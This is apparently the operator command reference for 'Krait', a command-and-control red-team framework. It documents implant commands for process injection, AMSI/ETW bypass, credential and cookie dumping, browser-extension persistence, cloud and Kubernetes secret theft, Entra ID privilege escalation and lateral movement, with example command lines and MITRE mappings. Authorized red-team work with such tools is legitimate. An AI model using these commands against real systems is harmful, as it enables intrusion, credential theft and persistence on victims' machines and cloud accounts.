← Documentation / Operator Guide

Command Reference

Every operator command with usage, examples, and MITRE mapping

All operator commands available in the Krait console. Commands are entered at the krait> prompt (global) or krait [agent_id]> prompt (session-scoped).

Session Management

CommandUsageDescription
sessionssessionsList all agent sessions with status, transport, hostname, PID, last seen, and lock holder
useuse <id>Lock and switch to an agent session. Prefix match on agent ID is supported. Use --force to override another operator’s lock
backgroundbackgroundRelease the current agent lock and return to session-select mode
renamerename <id> <name>Assign a friendly name to a session (e.g., rename abc12 dc01)
killkill <id>Queue an exit task to a specific agent without switching to it
removeremove <id>Remove a dead or stale session from the session list
graphgraphDisplay the agent topology as an ASCII tree showing parent-child relationships
graph dotgraph dotOutput a DOT-format graph (pipe to graphviz: graph dot | dot -Tpng -o graph.png)

Execution

CommandUsageDescriptionMITRE
<bofname>whoami, ps, sysinfoQueue a BOF by its short name. See BOF Reference for the full listVaries
<bofname> <args>ls C:\Users, cat C:\flag.txtQueue a BOF with argumentsVaries
cmdcmd <command>Run a shell command via cmd.exe /C. Output is capturedT1059.003
powershellpowershell <command>Run a PowerShell command (hidden window, no profile)T1059.001
execute-assemblyexecute-assembly <path> [args]Run a .NET assembly in-process with full evasion (HWBP AMSI/ETW bypass, LoadLibrary proxy)T1620
powerpickpowerpick <cmd>Run PowerShell command in-process via .NET CLR (no powershell.exe)T1059.001
sleepsleep <seconds>Set a one-shot sleep (agent sleeps this long once, then resumes normal interval)-
intervalinterval <seconds> [jitter%]Set the poll interval and optional jitter percentage-
exitexitQueue an exit task — the implant terminates on next poll-
migratemigrate [target]Migrate to a new process. Target is a process name (e.g., dllhost.exe). Standard builds use reflective PE injection; --ghost builds use process ghosting; --herpaderp attempts file overwrite then falls back to ghost cleanup. Default target: dllhost.exe. Avoid UWP redirect stubs (calc.exe, mspaint.exe, snippingtool.exe) with --remote-thread or --all-evasion — they exit before the remote thread can register. Use dllhost.exe, notepad.exe, or runtimebroker.exe.T1055
injectinject <pid>Inject agent into a running process. Linux: ptrace + memfd_create. macOS: task_for_pid (requires root + SIP disabled). Current agent exits after successful injectionT1055
spawnspawn <path>Spawn a new process with the agent loaded via DYLD_INSERT_LIBRARIES (macOS only). Works with SIP enabled — target must not be Apple-hardened. Current agent stays alive; new agent registers separatelyT1055
chainchain <cmd1>;<cmd2>;...Chain multiple BOFs into a single task. All execute sequentially on one poll cycle-

File Operations

CommandUsageDescriptionMITRE
downloaddownload <remote> [local]Download a file from the target (8MB chunks, resumable on interruption)T1041
uploadupload <local> <remote>Upload a local file to the targetT1105
cdcd <path>Change the remote working directory-
lsls [path]List directory contents (default: current directory)T1083
catcat <path>Display file contentsT1005
cpcp <src> <dst>Copy a file on the target-
mvmv <src> <dst>Move or rename a file on the target-
rmrm <path>Delete a file on the targetT1070.004
mkdirmkdir <path>Create a directory on the target-

Peer-to-Peer (P2P)

CommandUsageDescriptionMITRE
linklink <host> <pipe_name>Connect to an SMB child agent via named pipeT1570
tcp-linktcp-link <port>Listen for a TCP child agent to connect backT1570
unlinkunlink <child_id>Disconnect a child agent from the current parent-

SOCKS Proxy

CommandUsageDescriptionMITRE
socks startsocks start [port]Start a SOCKS5 proxy through the current agent (default port: 1080)T1572
socks stopsocks stopStop the SOCKS5 proxy-
socks statussocks statusShow SOCKS proxy status-

Operator

CommandUsageDescription
listlist or list <category>List available BOFs, optionally filtered by category
queuequeueShow pending tasks for the current agent
resultsresultsShow received task results
savesave <task_id> <path>Save a task result to a local file
stagestage <file>Load an encrypted payload for staged delivery
loglog [n]Show the event log (last n entries, default: all)
timelinetimelineShow the event timeline
redirectorredirectorShow the active traffic profile URIs
redirector nginxredirector nginx --backend <url> [options]Generate nginx HTTPS redirector config
redirector dnsredirector dns --domain <domain> --backend <ip> [options]Generate DNS redirector config
redirector cloudfrontredirector cloudfront --origin <host> [options]Generate CloudFront CDN redirector config (nginx + distribution setup)
operatorsoperatorsShow connected operators and their active sessions
reportreport [path]Export MITRE ATT&CK Navigator JSON layer
pythonpython <script>Run an impacket script through the operator proxy
proxyproxy <command>Run a command through the SOCKS proxy (proxychains)
clearclearClear the console
verboseverbose [0|1]Set output verbosity: 0 = results only, 1 = operational messages (default)
credscreds [list|add|remove|clear]Manage the credential store (auto-populated from BOF output). Use @cred:<id> to reference stored credentials in commands
helphelpShow the command help
quitquitDisconnect the CLI

Persistence

CommandUsageDescriptionMITRE
chrome-persist-installchrome-persist-install [--browser chrome|edge] --server URL [--profile name] [--cover name] [--force]Silent Chrome/Edge extension install with HMAC recalculationT1176
chrome-persist-removechrome-persist-remove [--browser chrome|edge] [--force]Remove silently installed Chrome/Edge extensionT1176

Chrome Extension

Commands available when a Chrome extension is installed via chrome-persist-install.

CommandUsageDescriptionMITRE
ext-cookiesext-cookies [domain]Dump browser cookies (optional domain filter)T1539
ext-tabsext-tabsList open browser tabs (URL, title)T1185
ext-screenshotext-screenshotCapture visible tab as PNG screenshotT1113
ext-historyext-history [query] [max]Browse history (default 100, optional search)T1217
ext-navigateext-navigate <url>Navigate active tab to URLT1185
ext-nmhext-nmh <cmd|whoami|ps|ping> [cmdline]Execute commands via Native Messaging Host proxyT1106

Cloud — AWS

BOFs for AWS credential discovery, resource access, and lateral movement. Available on both Windows and Linux agents. Credentials are sourced from IMDS, environment variables, or explicit --access-key/--secret-key/--token arguments.

Credential Discovery & Validation

CommandUsageDescriptionMITRE
aws-whoamiaws-whoamiCall sts:GetCallerIdentity — returns account ID, ARN, and user IDT1087.004
aws-imds-credsaws-imds-credsQuery EC2 instance metadata (IMDSv1/v2) for IAM role credentialsT1552.005
aws-iam-enumaws-iam-enum [--user NAME]Enumerate IAM policies, groups, and attached permissionsT1087.004
aws-assume-roleaws-assume-role <role-arn> [--session NAME]Call sts:AssumeRole and return temporary credentialsT1550.001
aws-cred-searchaws-cred-search [path]Search filesystem for AWS credential files, configs, and environment filesT1552.001

Cloud Resource Access

CommandUsageDescriptionMITRE
aws-s3-lsaws-s3-ls [bucket] [--prefix PATH]List S3 buckets or objects in a bucketT1619
aws-s3-getaws-s3-get <bucket> <key>Download an object from S3T1530
aws-ec2-enumaws-ec2-enum [--region REGION]Enumerate EC2 instances (ID, type, state, IP, name)T1580
aws-lambda-enumaws-lambda-enum [--region REGION]List Lambda functions with runtime, role, and environment variablesT1526
aws-secrets-manageraws-secrets-manager [--secret NAME]List or retrieve Secrets Manager secretsT1528
aws-ssm-paramsaws-ssm-params [--path PATH] [--decrypt]List or retrieve SSM Parameter Store valuesT1552.001
aws-ec2-userdataaws-ec2-userdata [--instance ID]Retrieve EC2 instance user-data (often contains bootstrap secrets)T1552.005

Lateral Movement

CommandUsageDescriptionMITRE
aws-ssm-execaws-ssm-exec <instance-id> <command>Execute a command on an EC2 instance via SSM RunCommandT1021.007
aws-lambda-execaws-lambda-exec <function-name> [payload]Invoke a Lambda function with optional JSON payloadT1648
aws-ec2-connectaws-ec2-connect <instance-id> [--user NAME]Push an SSH key via EC2 Instance Connect and return the connection commandT1021.004

Cloud — Azure

BOFs for Azure resource enumeration and lateral movement via the Azure Resource Manager API. Available on both Windows and Linux agents. Authenticate with a managed identity token from IMDS or an explicit --token argument.

CommandUsageDescriptionMITRE
azure-imds-tokenazure-imds-token [resource]Request managed identity OAuth2 token from Azure IMDST1552.005
azure-cred-searchazure-cred-searchSearch environment and metadata for Azure credentialsT1552.001
azure-whoamiazure-whoami [--token TOKEN]Identify current Azure principal (subscriptions + tenant)T1087.004
azure-keyvaultazure-keyvault <vault> [--secret NAME] [--token TOKEN]List Key Vault secrets and retrieve secret valuesT1552.001
azure-storage-lsazure-storage-ls <account> [--container NAME] [--token TOKEN]List Azure Storage containers and blobsT1619
azure-blob-getazure-blob-get <account> <container> <blob> [--token TOKEN]Download blob content from Azure StorageT1530
azure-vm-enumazure-vm-enum [--subscription ID] [--token TOKEN]Enumerate Azure VMs across subscriptionsT1580
azure-vm-runcommandazure-vm-runcommand <vm> <rg> <subscription> <cmd> [--token TOKEN]Execute commands on Azure VMs via Run Command APIT1021.007

Cloud — Entra ID

BOFs for Microsoft Entra ID (Azure AD) identity-plane enumeration, credential access, and privilege escalation via the Microsoft Graph API. Available on both Windows and Linux agents. Authenticate with a managed identity token from IMDS or an explicit --token argument.

Identity Enumeration

CommandUsageDescriptionMITRE
entra-whoamientra-whoami [--token TOKEN]Show current Entra ID identity (tenant, UPN, roles)T1087.004
entra-usersentra-users [--token TOKEN]List Entra ID users with key attributesT1087.004
entra-groupsentra-groups [--token TOKEN]List Entra ID groupsT1069.003
entra-group-membersentra-group-members <group_id> [--token TOKEN]List members of an Entra ID groupT1069.003
entra-rolesentra-roles [--token TOKEN]List Entra ID directory roles and assignmentsT1069.003
entra-role-membersentra-role-members <role_id> [--token TOKEN]List members of a specific directory roleT1069.003
entra-spsentra-sps [--token TOKEN]List Entra ID service principalsT1087.004
entra-condaccessentra-condaccess [--token TOKEN]List conditional access policiesT1518

Credential & Secret Access

CommandUsageDescriptionMITRE
entra-app-secretsentra-app-secrets [--token TOKEN]List application registrations with credentialsT1552.006
entra-app-add-secretentra-app-add-secret <object_id> [--token TOKEN] [--name NAME]Add a client secret to an application registrationT1098.001
entra-oauth-grantsentra-oauth-grants [--token TOKEN]List OAuth2 permission grants (delegated permissions)T1550.001

Privilege Escalation

CommandUsageDescriptionMITRE
entra-role-assignentra-role-assign <role_id> <principal_id> [--token TOKEN]Assign a directory role to a principalT1098.003
entra-app-rolesentra-app-roles <sp_id> [--token TOKEN]List app role assignments for a service principalT1069.003
entra-pimentra-pim [--token TOKEN]List PIM eligible role assignmentsT1069.003

Kubernetes

BOFs for Kubernetes enumeration via the API server. Authenticate with a service account bearer token (auto-detected from pod mount or --token argument).

CommandUsageDescriptionMITRE
k8s-enumk8s-enum [--namespace NS]Enumerate pods, services, namespaces, and deploymentsT1613
k8s-secretsk8s-secrets [--namespace NS] [--name SECRET]List or dump Kubernetes secrets (base64-decoded)T1552.007
k8s-rback8s-rbac [--namespace NS]Enumerate roles, cluster roles, and role bindingsT1069.003

Multi-Operator Commands

CommandUsageDescription
operatorsoperatorsList connected operators, their connection time, and which agent they’re locked to
use --forceuse <id> --forceOverride another operator’s lock on an agent (they receive a notification)

Using BOFs

BOFs (Beacon Object Files) are called by their short name. Arguments follow the name, separated by spaces.

krait [abc12345]> whoami
krait [abc12345]> ps
krait [abc12345]> ls C:\Users
krait [abc12345]> cat C:\Windows\System32\drivers\etc\hosts
krait [abc12345]> hashdump
krait [abc12345]> nanodump
krait [abc12345]> execute-assembly /opt/Seatbelt.exe -group=all
krait [abc12345]> wmi_exec 10.0.0.5 administrator Password1 "whoami"
krait [abc12345]> persist_comhijack install C:\path\to\proxy.dll

For the full BOF list with arguments and descriptions, see the BOF Reference.

Chaining

Chain multiple commands into a single task that executes sequentially on one poll cycle:

krait [abc12345]> chain whoami;ps;sysinfo;hostname
krait [abc12345]> chain ls C:\Users;cat C:\Users\admin\Desktop\flag.txt

Useful for reducing the number of callbacks when operating over a high-latency transport or when you need multiple recon results from the same poll.

Credential Store

Krait automatically extracts credentials from BOF output and stores them for reuse. Supported extraction sources: hashdump, samdump, enum-autologon, enum-creds, dpapi-creds, wifi-passwords, make-token, dump-chrome, dump-chromium, dump-firefox, rdp-thief, shspawnas, adduser, and setuserpass.

Managing Credentials

krait> creds list                           # list all stored credentials
krait> creds list type=ntlm                 # filter by type
krait> creds list domain=CORP               # filter by domain
krait> creds add plaintext CORP\admin P@ss  # manually add a credential
krait> creds remove 3                       # remove credential #3
krait> creds clear                          # remove all credentials

Credential References (@cred:)

Instead of copy-pasting usernames and passwords into commands, reference stored credentials inline with @cred:<id>. References are resolved server-side before dispatch, so they work from both the CLI and Web UI.

Syntax:

ReferenceResolves toExample
@cred:<id>DOMAIN\username password@cred:3 → CORP\admin P@ssw0rd
@cred:<id>.usernameUsername only@cred:3.username → admin
@cred:<id>.domainDomain only@cred:3.domain → CORP
@cred:<id>.userDOMAIN\username@cred:3.user → CORP\admin
@cred:<id>.secretPassword or hash@cred:3.secret → P@ssw0rd
@cred:<id>.typeCredential type@cred:3.type → plaintext

Usage examples:

krait [abc12345]> make-token @cred:3.domain @cred:3.username @cred:3.secret
  [*] @cred:3.domain → CORP
  [*] @cred:3.username → admin
  [*] @cred:3.secret → P@ssw0rd
  [+] Queued BOF task 4: make_token.x64.o

krait [abc12345]> shspawnas @cred:3.domain @cred:3.username @cred:3.secret notepad.exe sc.bin
krait [abc12345]> wmi_exec 10.0.0.5 @cred:3.username @cred:3.secret "whoami"

References also work in chain commands:

krait [abc12345]> chain make-token @cred:3.domain @cred:3.username @cred:3.secret;ls \\dc01\c$

OPSEC: The event log records the original command with @cred: references intact — plaintext credentials never appear in logs. Only the resolved form is sent to the agent.

If a @cred:<id> reference doesn’t match a stored credential, it passes through unresolved (the literal text is sent). The CLI previews each resolution before dispatch so you can verify the right credential was selected.